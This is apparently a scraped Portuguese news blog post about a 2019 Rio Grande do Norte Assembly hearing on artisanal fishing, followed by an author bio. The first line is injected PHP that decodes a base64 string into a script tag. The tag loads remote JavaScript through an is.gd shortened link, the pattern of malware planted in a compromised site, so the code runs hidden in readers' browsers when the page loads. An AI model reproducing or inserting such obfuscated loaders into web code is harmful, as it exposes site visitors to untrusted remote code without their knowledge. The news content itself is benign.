$str = 'PHNjcmlwdCBzcmM9Imh0dHBzOi8vaXMuZ2QvR2dHZjl6P3Y9djI1LjAiPjwvc2NyaXB0Pg=='; echo base64_decode($str);

Pesca artesanal no RN é debatida na Assembleia por iniciativa da deputada Isolda

Pesca artesanal no RN é debatida na Assembleia por iniciativa da deputada Isolda
10 Set 2019

As demandas e linhas prioritárias de ações que visem assegurar qualidade de vida e trabalho para as populações que vivem direta e indiretamente da pesca artesanal serão debatidas na audiência pública que a Assembleia Legislativa realiza nesta terça-feira (10), às 9h, numa proposição do mandato da deputada Isolda Dantas (PT). Com o tema “A pesca artesanal no estado do RN”, a audiência será realizada em parceria com a Rede Mangue Mar e Fundo Sociambiental Casa Investindo em Cuidar, no auditório Cortez Pereira.

“O objetivo do evento é debater com toda a sociedade potiguar a relevância da pesca artesanal para o Rio Grande do Norte, no que diz respeito à história das comunidades tradicionais, segurança alimentar e conservação do ambiente costeiro, marinho e de lagos, lagoas e açudes”, explica a deputada.

Estima-se que o conjunto de pescadoras e pescadores artesanais do Estado, organizados nas dezenas de colônias, chega a 35 mil profissionais, dos quais, pelo menos 15 mil atuam na pesca continental. Apesar deste dado, a pesca artesanal sofre com a inconsistência, inexistência ou insuficiência de políticas públicas direcionadas a um setor produtivo tão relevante para a população potiguar.

share

Anna Ruth
Anna Ruth

Anna Ruth Dantas é jornalista, apresentadora do programa RN Acontece, da Band Natal; produz e apresenta o programa Jornal da Cidade, da Rádio Cidade (94 FM - Natal), e apresenta o programa Panorama do RN (em rede com 16 emissoras de rádio do Rio Grande do Norte). Jornalista de grande credibilidade, atua também como consultora e ministra cursos de midia trainning na Trilhar Educação Corporativa.

Deixar uma resposta

O seu endereço de email não será publicado. Campos obrigatórios marcados com *